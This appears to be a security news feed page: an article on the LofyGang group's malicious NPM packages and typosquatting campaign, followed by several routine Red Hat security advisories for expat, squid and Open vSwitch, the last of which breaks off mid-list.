The group has been operating for over a year, promoting their tools in hacking forums, stealing credit card information, and using typosquatting techniques to target open source software flaws.

The LofyGang threat group is using more than 200 malicious NPM packages with thousands of installations to steal credit card data, and gaming and streaming accounts, before spreading stolen credentials and loot in underground hacking forums.

According to a report from Checkmarx, the cyberattack group has been in operation since 2020, infecting open source supply chains with malicious packages in an effort to weaponize software applications.

The research team believes the group may have Brazilian origins, owing to the use of Brazilian Portuguese and a file called "brazil.js." which contained malware found in a couple of their malicious packages.

The report also details the group's tactic of leaking thousands of Disney+ and Minecraft accounts to an underground hacking community using the alias DyPolarLofy and promoting their hacking tools via GitHub.

"We saw several classes of malicious payloads, general password stealers, and Discord-specific persistent malware; some were embedded inside the package, and some downloaded the malicious payload during runtime from C2 servers," the Friday report noted.

**LofyGang Operates With Impunity**

The group has deployed tactics including typosquatting, which targets typing mistakes in the open source supply chain, as well as "StarJacking," whereby the package's GitHub repo URL is linked to an unrelated legitimate GitHub project.

"The package managers do not validate the accuracy of this reference, and we see attackers take advantage of that by stating their package's Git repository is legitimate and popular, which may trick the victim into thinking this is a legitimate package due to its so-called popularity," the report stated.

The ubiquity and success of open source software has made it a ripe target for malicious actors like LofyGang, explains Jossef Harush, head of Checkmarx's supply chain security engineering group.

He sees LofyGang's key characteristics as including its ability to build a large hacker community, abusing legitimate services as command-and-control (C2) servers, and its efforts in poisoning the open source ecosystem.

This activity continues even after three different reports — from Sonatype, Securelist, and jFrog — uncovered LofyGang's malicious efforts.

"They remain active and continue to publish malicious packages in the software supply chain arena," he says.

By publishing this report, Harush says he hopes to raise awareness of the evolution of attackers, who are now building communities with open source hack tools.

"Attackers count on victims to not pay enough attention to the details," he adds. "And honestly, even I, with years of experience, would potentially fall for some of those tricks as they seem like legitimate packages to the naked eye."

**Open Source Not Built for Security**

Harush points out that unfortunately the open source ecosystem was not built for security.

"While anybody can sign up and publish an open source package, no vetting process is in place to check if the package contains malicious code," he says.

A recent report from software-security firm Snyk and the Linux Foundation revealed about half of firms have an open source software security policy in place to guide developers in the use of components and frameworks.

However, the report also found that those who have such policies in place generally exhibit better security — Google is making available its process of vetting and patching software for security issues to help close avenues to hackers.

"We see attackers take advantage of this because it's super easy to publish malicious packages," he explains. "The lack of vetting powers in disguising the packages to appear legit with stolen images, similar names, or even referencing other legitimate Git projects' websites just to see they get the other projects' stars amount on their malicious packages pages."

**Heading Toward Supply Chain Attacks?**

From Harush's perspective, we're reaching the point where attackers realize the full potential of the open source supply chain attack surface.

"I expect open source supply chain attacks to evolve further into attackers aiming to steal not only the victim's credit card, but also the victim's workplace credentials, such as a GitHub account, and from there, aim for the bigger jackpots of software supply chain attacks," he says.

This would include the ability to access a workplace's private code repositories, with the capability to contribute code while impersonating the victim, planting backdoors in enterprise grade software, and more.

"Organizations can protect themselves by properly enforcing their developers with two-factor authentication, educate their software developers to not assume popular open source packages are safe if they appear to have many downloads or stars," Harush adds, "and to be vigilant to suspicious activities in software packages."

LofyGang Uses 100s of Malicious NPM Packages to Poison Open Source Software

Red Hat Security Advisory 2022-6838-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6838-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6838  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
expat-debuginfo-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.aarch64.rpm  
expat-devel-2.2.10-12.el9_0.3.aarch64.rpm

ppc64le:  
expat-debuginfo-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debugsource-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-devel-2.2.10-12.el9_0.3.ppc64le.rpm

s390x:  
expat-debuginfo-2.2.10-12.el9_0.3.s390x.rpm  
expat-debugsource-2.2.10-12.el9_0.3.s390x.rpm  
expat-devel-2.2.10-12.el9_0.3.s390x.rpm

x86_64:  
expat-debuginfo-2.2.10-12.el9_0.3.i686.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.i686.rpm  
expat-debugsource-2.2.10-12.el9_0.3.x86_64.rpm  
expat-devel-2.2.10-12.el9_0.3.i686.rpm  
expat-devel-2.2.10-12.el9_0.3.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
expat-2.2.10-12.el9_0.3.src.rpm

aarch64:  
expat-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.aarch64.rpm

ppc64le:  
expat-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debugsource-2.2.10-12.el9_0.3.ppc64le.rpm

s390x:  
expat-2.2.10-12.el9_0.3.s390x.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.s390x.rpm  
expat-debugsource-2.2.10-12.el9_0.3.s390x.rpm

x86_64:  
expat-2.2.10-12.el9_0.3.i686.rpm  
expat-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.i686.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.i686.rpm  
expat-debugsource-2.2.10-12.el9_0.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9BEdzjgjWX9erEAQgpEw//SAVaBRrOgFmB37H+zj9VIGGk+//euxLS  
eXo9/Yn+ysPrdDzSVMxPVoiUY7oyNmuf1tDhacy8p90ZJ+SqpbL2pqAxcVMgq0TF  
8ZMYh54aYp6UM559jonyw8vybrp9YA1LEas3PpctLESErqoM7zLD40oxG0f/o9ly  
K5ezEmbWtdRbkHGbx0waQEZdRinVVtRCnLU8tjRjaTl7/3129O9Qa8qYMhAx4IB4  
pCL8ZCSwFGeQ4va0vHZkcw1x2Qx5WVrFbRV68AYTV/ISGh/bQtPUT+Zk1y/KZKwy  
LQmjw4nX1I8Zpue4+yddOaApdlpTk5CSWkAIUDJOtm/GiKF/nKn6tkZm+LgobpSP  
bUaipq+MbDDsNlnL5vFYob1aqdGvCPh6CKDpbJ2zFFF8dEKMzp4ugJAOD1IVECk0  
5GUwLjo2TuMNJkARQYlZrWkgt5SDt+Rev1tJ4c+GoUiXG2BNzvPG3od+nPUfJEId  
NMDQ5wnyOdXrNV4bDp2A8E4B523YbeaMZ0hbT9k+A7n4ICJMfcxLdwYWR4Eefq7S  
rWHFYDEmrhFUCaB8CwS7yeCkig4xhHY2PeDTjSyorCkQ4hWdKWrhZLT4qEs0ZcQ0  
rTwCDyF0nu4d0V4jMb+gg1GVLFj4I6bhSSGCMf0phGIBF2nwLKuiBbzEPU4S1I1J  
v9xf4LYIGu8=wW9n  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6838-01

Red Hat Security Advisory 2022-6839-01 - Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: squid security update  
Advisory ID:       RHSA-2022:6839-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6839  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-41318  
====================================================================  
1. Summary:

An update for squid is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Squid is a high-performance proxy caching server for web clients,  
supporting FTP, Gopher, and HTTP data objects.

Security Fix(es):

* squid: buffer-over-read in SSPI and SMB authentication (CVE-2022-41318)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the squid service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2129771 - CVE-2022-41318 squid: buffer-over-read in SSPI and SMB authentication

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
squid-5.2-1.el9_0.2.src.rpm

aarch64:  
squid-5.2-1.el9_0.2.aarch64.rpm  
squid-debuginfo-5.2-1.el9_0.2.aarch64.rpm  
squid-debugsource-5.2-1.el9_0.2.aarch64.rpm

ppc64le:  
squid-5.2-1.el9_0.2.ppc64le.rpm  
squid-debuginfo-5.2-1.el9_0.2.ppc64le.rpm  
squid-debugsource-5.2-1.el9_0.2.ppc64le.rpm

s390x:  
squid-5.2-1.el9_0.2.s390x.rpm  
squid-debuginfo-5.2-1.el9_0.2.s390x.rpm  
squid-debugsource-5.2-1.el9_0.2.s390x.rpm

x86_64:  
squid-5.2-1.el9_0.2.x86_64.rpm  
squid-debuginfo-5.2-1.el9_0.2.x86_64.rpm  
squid-debugsource-5.2-1.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41318  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A/tzjgjWX9erEAQgfZA/9HJUFYJLUsflB+655ZYluYALZgLYXdyUR  
5LdEVLft4Xk+0BNEII+F0ccPT6qYAFRQ65asWPVZtPKsOc9j8/B1AZ+LLXp9kYcV  
a6RfRVxjc/krmvAl7RysKNjg7QSagTsysMIZ3Bz+aiYKJuiESG5c7EedTHDTX2a2  
S0ZFHkIMID7NJrWAacnkYsSsMUO3Rz3kWBe163lC1Is8pSj0P+Z59qAu26Jrb8Jl  
0oMocTuVl+9QgVJF2GkybK45VxCVNlR8jNBsydrEilm/4rjdQAX0n2dxwYAL4Hu+  
Q6tf+Ifg6YsTPSQtex1ezSvq8cY4INmxAcfGy6mB3FUV1JXLcMmXbj7J6xsyX244  
eGI/4b8cAMOA6tFzx0cIMVvshHBRNw3iyp2Pi9M245VVBRBatGwQ4KVBq0XESKwB  
WArsEN9ZiJKi1F3qgwWIG6gL/l9bTHtQn1gkset3NnmVnT/JjJdzf5azP9TckEA7  
+WyRdC7Pcoi60aRrkMgMgycnLVdBNALY+rRJxSDy+pkmg0EIBQTUJoHHDqyKS/ei  
jebgINvq/zAMHzO+xzmIimJcqVbDU2pIPhTXYiFL0s5MJqsxSmJmG/Nc093QuHsE  
T7koB327qXVDu5RlGNf42Almw46/zWG7AaZtQUV7TOqM67LUCwsNPSJ6s1HCXZ+C  
LLsk+QabmmU=lAus  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6839-01

Red Hat Security Advisory 2022-6850-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openvswitch2.11 security update  
Advisory ID:       RHSA-2022:6850-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6850  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-2132  
====================================================================  
1. Summary:

An update for openvswitch2.11 is now available for Fast Datapath for Red  
Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 7 - noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* dpdk: DoS when a Vhost header crosses more than two descriptors and  
exhausts all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 7:

Source:  
openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

noarch:  
openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

ppc64le:  
openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.ppc64le.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

s390x:  
openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.s390x.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm

x86_64:  
openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.x86_64.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2132  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A9NzjgjWX9erEAQhS6g//dFhnNsL6tYKMlk4Lrp34SksiKG0a7mVh  
pUzeQLBdgCIJ/AW/nYYAKdmLPAA9tbmYPGPEDq4lch7TmCqSTfurW+XJtddfiBjv  
MWFFGBEtTBZRB4T5RskKTjjgdwJdXSVX2D+LTFI7Z2ZdGvhtc6DcdYbvowP7S4Ni  
dZDx7ByueVuM0jJlHePgUMLv8SvT64SDPNWSJqsgM8MLWOMrBRc1RoOwYmWpRYJp  
ohvwvEbEiS6F8g6vDQGhVph2b0v5HYnjFvt5H3TaGVFlzbfsi+2orkXFnJQZ6ube  
I4HTboCKF4dYGiiSgMEOOYF6dbly4uw7cg+g8dlF8KpbQJKfGvyuD5WqKKnmFC+6  
Q031OQK6OzEfcq2LjJgnxq0CA4JjptO0dhfYPgZ8k1wRu/ZmHFs/fTydn7yihWj3  
ux3zkyjOIQUvpfxapxEfZ/DgiR1cU8zqN+Z5SGc365BdkYB2DlqUnFQFEqsLxIId  
R/HeMM1zn7MZ8V+n2pA2vV4HmKdYD8134ukT0B0El1cceERKDMZFKZLi/iXNIEhm  
xJQ+ibu8e/+JngOhmEmDHz2QQaEyIav6jceWCNig59By5oGfRJ8fvq7TQ1TtECDt  
b9imH8r/ylKbjhaPyvrGbPuV7ARuKQxs5/r/UhIAA1kvPrt1jGxST6jUeVO/Mi6K  
3jv+d9QUyS4!Lp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6850-01

Red Hat Security Advisory 2022-6831-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6831-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6831  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
expat-2.2.5-4.el8_4.4.src.rpm

aarch64:  
expat-2.2.5-4.el8_4.4.aarch64.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.aarch64.rpm  
expat-debugsource-2.2.5-4.el8_4.4.aarch64.rpm  
expat-devel-2.2.5-4.el8_4.4.aarch64.rpm

ppc64le:  
expat-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-debugsource-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-devel-2.2.5-4.el8_4.4.ppc64le.rpm

s390x:  
expat-2.2.5-4.el8_4.4.s390x.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.s390x.rpm  
expat-debugsource-2.2.5-4.el8_4.4.s390x.rpm  
expat-devel-2.2.5-4.el8_4.4.s390x.rpm

x86_64:  
expat-2.2.5-4.el8_4.4.i686.rpm  
expat-2.2.5-4.el8_4.4.x86_64.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.i686.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.x86_64.rpm  
expat-debugsource-2.2.5-4.el8_4.4.i686.rpm  
expat-debugsource-2.2.5-4.el8_4.4.x86_64.rpm  
expat-devel-2.2.5-4.el8_4.4.i686.rpm  
expat-devel-2.2.5-4.el8_4.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7svtzjgjWX9erEAQjaTg//ZLhz2g9jo1UyFDwiXv2ikm12gbo/z39B  
LrIK+cISbaj2ZmnYaaOVBctGaaM6iwjjw8EnDJUC3VkkIZLE80TD4D3mmUtQa8J/  
g35XEUZR5mxj/34UCH0eiHJ/IuDyEsNh7n8Tk4H8KjdNCUH5Z4F/m3DLXnG+rEnz  
Vc57sI/BBbMsLuYzdrV/+LUAXl3JNusv5MkkB6dlGd6BkVaJYP4YYCU8AZRYPaj4  
2u6lxeUYkrKnFAfgbI/uBxQvHyCZt+7ssbSQSMMkEzEYWbsRz143ykP7Q0ybZ/JL  
NwzflfH8czIESyWID1fwlwGJbBFIZkvLp8Zaf7hqhW/TdcGWb4yRXYnkaMzemYG1  
YUaJRJ0ix6F058q6SpoRNscjFIB9zOGkdtaZY1W0Uq4BqHwO5hj2lhPfEdfxOBlk  
BCfq5nbvOktd6jP9GntJHTJwA/nLyaj8fhBMWlzPqoSvfeL6SAmW+RV3SRsjpmGD  
vbrf5CeFsz2BawRAB+W63PYmYx60F1xarmhwlUqdt6FsF87V6k6hiV/NkZMvzs5Q  
l2e8PR9IUzkapp1pMDc5EC1RhBv8e6hS16C7iFnqEwmOFEF1hmLo2PK38jgOaEvH  
tiSmbSFKL4UQsn7byPAjpY8T+pKFxfVfAyOV67LfKzQ+T6m+Si/WHt+u6G2Yra3A  
wyAFjcY9yPE=livL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6831-01

Red Hat Security Advisory 2022-6832-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6832-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6832  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2):

Source:  
expat-2.2.5-3.el8_2.3.src.rpm

aarch64:  
expat-2.2.5-3.el8_2.3.aarch64.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.aarch64.rpm  
expat-debugsource-2.2.5-3.el8_2.3.aarch64.rpm  
expat-devel-2.2.5-3.el8_2.3.aarch64.rpm

ppc64le:  
expat-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-debugsource-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-devel-2.2.5-3.el8_2.3.ppc64le.rpm

s390x:  
expat-2.2.5-3.el8_2.3.s390x.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.s390x.rpm  
expat-debugsource-2.2.5-3.el8_2.3.s390x.rpm  
expat-devel-2.2.5-3.el8_2.3.s390x.rpm

x86_64:  
expat-2.2.5-3.el8_2.3.i686.rpm  
expat-2.2.5-3.el8_2.3.x86_64.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.i686.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.x86_64.rpm  
expat-debugsource-2.2.5-3.el8_2.3.i686.rpm  
expat-debugsource-2.2.5-3.el8_2.3.x86_64.rpm  
expat-devel-2.2.5-3.el8_2.3.i686.rpm  
expat-devel-2.2.5-3.el8_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7slNzjgjWX9erEAQhubRAAhOwHmqgokhhYOsZjMdN6KaDUqts5+19U  
/t3sBxAMYNehzxCDTKbt1hf2kEJDD7V7pcZ/VcbKyb2iWisYxPMVFxvRfc6tcB87  
M9UIKYyhC8CsFQKxijFpWRIOhhH/hEc2eetC1RlkAYotrBcmVthguNHmGgEfaN0N  
kZTXcBsXm9jrO8UhyJakXMvHD6C9PsMLTrJYcDZbBJZpLSoGvAOlFlKjaz2VMY+7  
HPqdKZpPqmHR2PxsEPYXmk0mzQxzxPW6o8oHiheaHz8CkKH+97oNXEawVjuczGxk  
62JNTB+OtVlpMt7ppngc0Go3eTmVj9Hr8uDDt83HU/sN5BhSoXRCZjVNodvhgjAN  
hSD8sAfQSosZh5fX1QXMIql16ZudyxlyIXdPub3w4I7ZUCG7v69cHSY1b8b9HKyF  
dpkgWrvtTaTVe0CSU3xcDijwng0MqJWLsAIjPvk3/DdJI4hdXd7iPGeQFkqTqiOA  
Lf8v45vwjK9ngfj1PbHptBlxG+bfYPyGCVPu10TniVlobrUXQaYrzut4lyZZFMyp  
EhFoenudt86L6vOo8s9/ZaIlZimhWH+zlcwdw4ksVQ/cCVeKTHG6v7lbTL07TOPs  
d38rmnyJd/ulrGC9T1Rj8ZMMQ3D+c1xF6R8g1leE/t3mD718bfjnrPN7umx/d/Av  
TQMo3Q0dgVo=qSey  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6832-01

Red Hat Security Advisory 2022-6834-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6834-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6834  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
